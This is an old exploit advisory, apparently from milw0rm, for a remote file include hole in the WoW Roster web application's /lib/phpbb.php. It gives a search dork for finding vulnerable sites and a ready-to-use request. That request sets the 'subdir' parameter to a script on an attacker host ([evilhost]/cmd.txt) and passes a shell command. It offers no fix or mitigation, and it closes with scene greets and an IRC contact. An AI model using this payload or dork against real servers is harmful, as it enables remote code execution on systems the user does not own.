--------------------------------------------------------------------------------
Title : WoW Roster (/lib/phpbb.php) Remote File Include Vulnerability
--------------------------------------------------------------------------------
Affected software description :
Application : World of Warcraft (WoW) Roster
URL : http://www.wowroster.net/
--------------------------------------------------------------------------------
dork : "wow roster version 1.*"
Exploit :
--------------------------------------------------------------------------------
Usage:
http://[target]/[roster_path]/lib/phpbb.php?subdir=http://[evilhost]/cmd.txt?&cmd=ls
--------------------------------------------------------------------------------
greets:
XLR, rdy, wiggle, phreek, menx [...]
special greet: my old gf ;)
--------------------------------------------------------------------------------
Contact:
Nick: |peti on irc.quakenet.org/irc.efnet.net
--------------------------------- [ eof ] --------------------------------------
# milw0rm.com [2006-08-02]